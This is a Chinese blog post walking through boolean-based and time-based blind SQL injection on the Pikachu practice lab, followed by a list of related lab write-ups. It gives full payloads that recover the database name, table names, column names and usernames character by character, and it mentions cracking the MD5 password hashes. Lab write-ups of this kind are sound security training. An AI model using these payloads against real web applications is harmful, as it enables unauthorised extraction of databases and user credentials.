pikachu盲注

最新推荐文章于 2024-05-20 22:46:41 发布
最新推荐文章于 2024-05-20 22:46:41 发布
阅读量259 收藏 2
点赞数 1
分类专栏: 小白安全 文章标签: 安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/miaositekali/article/details/129149563
版权

盲注(base on boolian)

通过输入kobe,kobe'和kobe'#可以判断存在字符型注入,并且只会返回true和false,不会返回报错信息。

判断库名的第一个字母

kobe' and ascii(substr(database(),1,1))>111#
kobe' and ascii(substr(database(),1,1))>112#

大于111,不大于112,则该字符的ASCII码为112,该字符为p。

可以检验一下。

kobe' and ascii(substr(database(),1,1))=112#

依次进行手动注入,可以得到库名pikachu。

接下来需要得到表名,操作与得到数据库名类似。

kobe' and ascii(substr(( select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=104#

可以拿到第一个表名的第一个字母h,依次进行手工注入,可以得到表名,httpinfo,member,message,users,xssblind。

接着我们需要拿到users的各个列名。

kobe' and ascii(substr((select column_name from information_schema.columns where table_name='users'limit 0,1),1,1))=85#

这样就拿到了users表的第一个字段名,依次可得到users表中的所有字段名。

紧接着我们还需要拿到字段username中的值。

kobe' and ascii(substr((select username from users limit 0,1),1,1))=97#

可以得到username字段第一个记录的第一个字母a。

同理也可以拿到password的记录,只不过还需要进行md5解密,

盲注(base on time)

kobe' and sleep(5)#

延时五秒。

利用延时,得到库名

kobe' and if((substr(database(),1,1))='p',sleep(5),null)#

可以得到数据库名的第一个字母p,依次注入可以得到数据库名pikachu。

类似的可以得到表名和列名。

kobe' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))='h',sleep(5),null)#

是喵斯特ya
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入之pikachu盲注练习
windStudyer的专栏
05-21 786
sql注入pikachu盲注练习
pikachu——布尔盲注
Lollipop_zhi的博客
03-02 6564
基于boolean的盲注主要表现: 1.没有报错信息 2.不管是正确的输入,还是错误的输入,都只显示两种情况(我们可以认为是0或者1) 3.在正确的输入下,输入and 1=1/and 1= 2发现可以判断 首先用’来测试一下 然后输入kobe’ and 1=1#,当改成1=2时,显示“不存在”。此时,说明存在SQL注入点,因为会把我们输入的 1=1,1=2执行 输入kobe’ and ascii(substr(database(),1,1))>113# 显示“不存在” (因为手工
pikachu盲注(base on time)
weixin_50339082的博客
06-14 1027
pikachu盲注(base on time) 打开pikachu测试平台。 先输入一个’ 尝试一下,发现反馈不报错。 输入kobe,发现反馈信息不变 打开浏览器的开发者工具(F12),控制台,选择网络。 输入 kobe’ and sleep(5)#,发现延迟5秒发送。 输入错误信息,发现sleep语句不执行 这样我们就可以写一个判断 kobe’ and if((substr(database(),1,1))=‘?’,sleep(5),null)# 输入 kobe’ and if((subst
pikachu靶场(SQL注入基于布尔的盲注)python实现
最新发布
记录学习
05-20 488
用python脚本实现布尔盲注
pikachu SQL 注入(盲注
weixin_60508121的博客
04-19 3741
SQL盲注 1.判断是否存在注入点 kobe' and 1=1# 正常返回结果 kobe' and 1=2# 返回空结果 2 2.猜测数据库长度(burp探测) kobe' and length(database())>=k # 数据库的长度为7 2. 猜测数据库名 kobe' and (select substr(database(),1,1))='k'# 得到数据库名为pikachu 3.盲注表名猜测 kobe' and length((sele..
pikachu盲注(base on boolian)
weixin_50339082的博客
06-15 1306
pikachu盲注(base on boolian) 发现只能存在kobe’ and 1=1 #连or 都会报错 利用and来构造payload: kobe' and ascii(substr(database(),1,1))=112# 利用burpsuit来进行测试,爆出database,不对的话就会出现用户名不存在,正确的话就会出现用户正确信息,可采用二分法来减少盲注次数。 ...
[Pikachu靶场实战系列] SQL注入(盲注
00勇士王子的博客
07-29 3271
目录盲注布尔盲注时间盲注 盲注 盲注的意思就是说页面没有明显的回显,我们只能通过其他方式判断注入点。 常见的方式有两种,一种是布尔盲注,通过页面返回的不同状态判断语句是否被执行。另一种是时间盲注,通过页面加载时间来判断语句是否被执行。 布尔盲注 先输入一个之前关卡中的名字,返回正常 加上单引号,并没有报错,而是返回了我输入的信息不存在 加上注释符号后,返回又正常了,说明注入点存在,且就是单引号闭合 判断数据库名的长度 lucy’and length(database())>=1 # l
pikachu-master
05-04
Pikachu漏洞测试平台搭建详解》 在网络安全领域,漏洞测试是确保系统安全的重要环节。Pikachu,一个以小精灵命名的漏洞测试平台,因其易用性和实用性,成为了许多安全研究人员和初学者的首选工具。本文将详细介绍...
pikachu LINUX安装包,
07-14
上传到根目录,解压直接就问访问,里面有教程
pikachu靶场通关
11-19
pikachu靶场通关
pikachu靶场环境
02-12
"pikachu靶场环境" 是一个专门为网络安全学习和实践设计的平台,它为用户提供了一个安全的、受控的环境来模拟真实的网络攻击与防御场景。在这个环境中,参与者可以学习和提升自己的渗透测试技巧,同时了解如何加固...
pikachu-master.zip
06-25
Pikachu靶场:全面理解与提升网络安全技能》 "Pikachu-master.zip"这个压缩包文件,无疑为我们提供了一个宝贵的网络安全学习资源——Pikachu靶场。靶场,是网络安全领域中的一个重要概念,它模拟真实网络环境,让...
pikachu(时间盲注
ANYOUZHEN的博客
05-11 1243
pikachu基于时间盲注 我们输入' 返回I don't care 我们输入anyouzhen sakura ,同样返回I don't care 我们可以利用sleep()函数进行判断,是否存在注入点 我们输入 kobe' and sleep(5)# 查看网络,发现雀食存在5s的延迟,说明后面闭合后的内容被带入到数据库中去了 所以可以说明存在注入点,这种注入方式被称为时间盲注 基于时间的延迟: kobe' and if((substr(database(),1,1))='p',sl
PIKACHU--SQL注入
鲨鱼辣椒的博客
05-17 1157
SQL Inject(SQL)概述 注入漏洞在全球漏洞排行榜上一直高居榜首而注入漏洞中首当其冲的就是数据库注入漏洞,SQL注入漏洞主要的成因是子啊数据交互中,前端数据传入到后台处理时,没有做严格的过滤,导致传入后台的“数据”拼接到SQL语句中后,被当成SQL语句的一部分执行,从而产生与原本语句截然不同的意思,导致数据库受损(被脱裤、删除、甚至整个服务器权限沦陷) SQL注入流程 注入点探测 手动方式:手工构造SQL语句进行注入点发现 自动方式:采用自动扫描工具,自动进行注入点发现 信息获取 通过
Pikachu布尔盲注结合BurpSuite获取数据库名字详解
小小小屿屿屿的博客
11-18 483
有些情况下,开发人员屏蔽了报错信息,导致攻击者无法通过报错信息进行注入的判断。这种情况下的注入,称为盲注盲注根据展现方式,分为布尔型盲注和时间型盲注
盲注的练习(作业)
qq_43473164的博客
04-08 300
基于boolean的盲注 第一步 测试 payload:’ and 1=1#(页面不变) | ’ and 1=2#(页面变化) 说明存在sql漏洞. 第二步 盲注 爆表:payload:’ and ascii(substr((select table_name from information_schema.tables where table_schema=database()),1,1)...
pikachu靶场(sql注入)(宽字节注入和盲注
weixin_54431413的博客
03-17 3852
一、宽字节注入 1.宽字节注入原理 宽字节注入有addslashes,mysql_real_escape_string,mysql_escape_string等转义的函数,对输入'进行了转义\' 在这个靶场是addslashes(),这个函数对这些进行了转义 单引号(') 双引号(") 反斜杠(\) NULL 但是在下方设置编码时设置为了gbk编码, 利用反斜杠编码为%5c,这里用%df构成(連)字绕过对 ' 的转义 2.首先利用burp抓包 然后用 1%df' union selec
Pikachu---SQL注入
从不专注的人的博客
07-05 2264
概述 什么是SQL注入漏洞 注入(SQLi)是一种注入攻击,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。 SQL注入漏洞可能会影响使用SQL数据库(如MySQL,Oracle,SQL Server或其他)的任何网站或Web应用程序。犯罪分子可能会利用它来未经授
一文了解pikachu的SQL注入
allintao的博客
03-01 2683
本文章主要讲解关于pikachu的注入方式。目录一、数字型注入(post)二、字符型注入(get)三、搜索型注入四、xx型注入五、"insert/update"注入六、"delete"注入七、"http header"注入八、盲注(base on boolian)九、盲注(base on time)十、宽字节注入。
pikachu 盲注
08-25
"PIKACHU"盲注是指基于时间或布尔值的盲注技术。盲注是一种注入攻击技术,没有页面回显来判断是否存在注入。基于时间的盲注是指攻击者通过在注入语句中添加延时函数来检测注入的结果是否延时。基于布尔值的盲注是指...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值